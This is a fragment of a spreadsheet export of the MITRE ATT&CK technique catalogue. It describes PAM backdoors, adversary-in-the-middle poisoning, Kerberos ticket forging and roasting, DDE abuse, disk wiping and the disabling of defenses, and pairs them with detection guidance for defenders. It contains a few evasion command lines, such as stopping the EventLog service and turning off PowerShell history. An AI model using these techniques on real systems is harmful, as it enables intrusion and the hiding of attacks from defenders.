    <t>Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is &lt;code&gt;pam_unix.so&lt;/code&gt;, which retrieves, sets, and verifies account authentication information in &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
Adversaries may modify components of the PAM system to create backdoors. PAM components, such as &lt;code&gt;pam_unix.so&lt;/code&gt;, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/003</t>
  </si>
  <si>
    <t>26 June 2020</t>
  </si>
  <si>
    <t>Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present)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</si>
  <si>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George Allen, VMware Carbon Black; Scott Knight, @sdotknight, VMware Carbon Black</t>
  </si>
  <si>
    <t>Modify Authentication Process: Network Device Authentication</t>
  </si>
  <si>
    <t>Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.  The modification includes a specific password which is implanted in the operating system image via the patch.  Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/004</t>
  </si>
  <si>
    <t>Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).</t>
  </si>
  <si>
    <t>Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)
Adversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557</t>
  </si>
  <si>
    <t>Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.</t>
  </si>
  <si>
    <t>Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay</t>
  </si>
  <si>
    <t>By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. 
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)
Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)
Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557/001</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</si>
  <si>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</si>
  <si>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Eric Kuehn, Secure Ideas; Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle: ARP Cache Poisoning</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.
An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1557/002</t>
  </si>
  <si>
    <t>15 October 2020</t>
  </si>
  <si>
    <t>Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. 
Consider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.</t>
  </si>
  <si>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Attackers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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
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 (Citation: AdSecurity Cracking Kerberos Dec 2015)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including Kerberos tickets, are stored.
Monitor for unusual processes accessing &lt;code&gt;secrets.ldb&lt;/code&gt; and &lt;code&gt;.secrets.mkey&lt;/code&gt; located in &lt;code&gt;/var/lib/sss/secrets/&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Cody Thomas, SpecterOps; Tim (Wadhwa-)Brown</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Golden Ticket</t>
  </si>
  <si>
    <t>Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) 
Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)
The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/001</t>
  </si>
  <si>
    <t>05 November 2020</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</si>
  <si>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</si>
  <si>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Itamar Mizrahi, Cymptom</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Silver Ticket</t>
  </si>
  <si>
    <t>Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)
Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/002</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) 
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Kerberoasting</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</si>
  <si>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attack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</si>
  <si>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https://attack.mitre.org/techniques/T1558/003</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</si>
  <si>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</si>
  <si>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Valid domain account or the ability to sniff traffic within a domain</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: AS-REP Roasting</t>
  </si>
  <si>
    <t>Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) 
Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)
For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) 
An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)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</si>
  <si>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https://attack.mitre.org/techniques/T1558/004</t>
  </si>
  <si>
    <t>24 August 2020</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)</t>
  </si>
  <si>
    <t>Dan Nutting, @KerberToast; Jacques Pluviose, @Jacqueswildy_IT; James Dunn, @jamdunnDFW, EY; Swapnil Kumbhar; Yossi Nisani, Cymptom</t>
  </si>
  <si>
    <t>Valid domain account</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1559</t>
  </si>
  <si>
    <t>Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.</t>
  </si>
  <si>
    <t>Inter-Process Communication: Component Object Model</t>
  </si>
  <si>
    <t>Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559/001</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Inter-Process Communication: Dynamic Data Exchange</t>
  </si>
  <si>
    <t>Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1559/002</t>
  </si>
  <si>
    <t>Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).
OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1560</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</si>
  <si>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</si>
  <si>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Archive Collected Data: Archive via Utility</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.
Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/001</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</si>
  <si>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</si>
  <si>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Archive Collected Data: Archive via Library</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/002</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</si>
  <si>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</si>
  <si>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Archive Collected Data: Archive via Custom Method</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/003</t>
  </si>
  <si>
    <t>Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.</t>
  </si>
  <si>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
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Disk Wipe: Disk Content Wipe</t>
  </si>
  <si>
    <t>Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561/001</t>
  </si>
  <si>
    <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t>
  </si>
  <si>
    <t>Disk Wipe: Disk Structure Wipe</t>
  </si>
  <si>
    <t>Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. 
Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.
To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561/002</t>
  </si>
  <si>
    <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</si>
  <si>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could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562</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</si>
  <si>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</si>
  <si>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Containers, IaaS, Linux, Network, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Anti-virus, Digital Certificate Validation, File monitoring, Firewall, Host forensic analysis, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify Tools</t>
  </si>
  <si>
    <t>Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information.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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/001</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</si>
  <si>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</si>
  <si>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Gal Singer, @galsinger29, Team Nautilus Aqua Security; Gordon Long, Box, Inc., @ethicalhax; Nathaniel Quist, Palo Alto Networks; Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security</t>
  </si>
  <si>
    <t>Anti-virus, File monitoring, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>Impair Defenses: Disable Windows Event Logging</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</si>
  <si>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EventLog service may be disabled using the following PowerShell line: &lt;code&gt;Stop-Service -Name EventLog&lt;/code&gt;.(Citation: Disable_Win_Event_Logging)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</si>
  <si>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https://attack.mitre.org/techniques/T1562/002</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</si>
  <si>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</si>
  <si>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Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team</t>
  </si>
  <si>
    <t>Impair Defenses: Impair Command History Logging</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/003</t>
  </si>
  <si>
    <t>24 April 2021</t>
  </si>
  <si>
    <t xml:space="preserve">Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, or &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables may be suspicious.
Monitor for modification of PowerShell command history settings through processes being created with &lt;code&gt;-HistorySaveStyle SaveNothing&lt;/code&gt; command-line arguments and use of the PowerShell commands &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt; and &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. </t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify System Firewall</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/004</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.</t>
  </si>
  <si>
    <t>Firewall</t>
  </si>
  <si>
    <t>Impair Defenses: Indicator Blocking</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) &lt;code&gt;Set-EtwTraceProvider&lt;/code&gt; cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/006</t>
  </si>
  <si>
    <t>13 January 2021</t>
  </si>
  <si>
    <t>Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.
Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}&lt;/code&gt;</t>
  </si>
  <si>
    <t>Rob Smith</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify Cloud Firewall</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</si>
  <si>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connectivity.(Citation: Expel IO Evil in AWS)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/007</t>
  </si>
  <si>
    <t>Monitor cloud logs for modification or creation of new security groups or firewall rules.</t>
  </si>
  <si>
    <t>Expel</t>
  </si>
  <si>
    <t>Impair Defenses: Disable Cloud Logs</t>
  </si>
  <si>
    <t>An adversary may disable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attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/008</t>
  </si>
  <si>
    <t>15 March 2021</t>
  </si>
  <si>
    <t>Monitor logs for API calls to disable logging. In AWS, monitor for: &lt;code&gt;StopLogging&lt;/code&gt; and &lt;code&gt;DeleteTrail&lt;/code&gt;.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: &lt;code&gt;google.logging.v2.ConfigServiceV2.UpdateSink&lt;/code&gt;.(Citation: Configuring Data Access audit logs)  In Azure, monitor for &lt;code&gt;az monitor diagnostic-settings delete&lt;/code&gt;.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.</t>
  </si>
  <si>
    <t>Alex Soler, AttackIQ; Ibrahim Ali Khan; Janantha Marasinghe; Matt Snyder, VMware; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee ; Syed Ummar Farooqh, McAfee</t>
  </si>
  <si>
    <t>Impair Defenses: Safe Mode Boot</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/009</t>
  </si>
  <si>
    <t>Monitor Registry modification and additions for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a &lt;code&gt;\*&lt;/code&gt; in front of the "Startup" value name: &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\["\*Startup"="{Path}"]&lt;/code&gt; or by adding a key to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal&lt;/code&gt;.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)
Monitor execution of processes and commands associated with making configuration changes to boot settings, such as &lt;code&gt;bcdedit.exe&lt;/code&gt; and &lt;code&gt;bootcfg.exe&lt;/code&gt;.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)</t>
  </si>
  <si>
    <t>Jorell Magtibay, National Australia Bank Limited; Kiyohito Yamamoto, RedLark, NTT Communications; Yusuke Kubo, RedLark, NTT Communications</t>
  </si>
  <si>
    <t>Anti-virus, Host Intrusion Prevention Systems</t>
  </si>
  <si>
    <t>Impair Defenses: Downgrade Attack</t>
  </si>
  <si>
    <t>Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)
Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/010</t>
  </si>
  <si>
